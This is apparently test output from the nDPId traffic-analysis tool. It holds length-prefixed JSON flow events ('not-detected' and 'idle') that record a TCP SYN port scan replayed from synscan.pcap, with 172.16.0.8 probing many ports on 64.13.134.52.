+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":996,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7512,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1051,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1051,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9575,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9575,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9575,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9575,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9593,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1044,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9594,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1044,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9593,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9594,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9595,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9595,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9595,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9595,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15742,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15742,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15742,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15742,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19842,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19842,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1417,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1417,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9618,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9618,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9618,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9618,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":38292,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":38292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 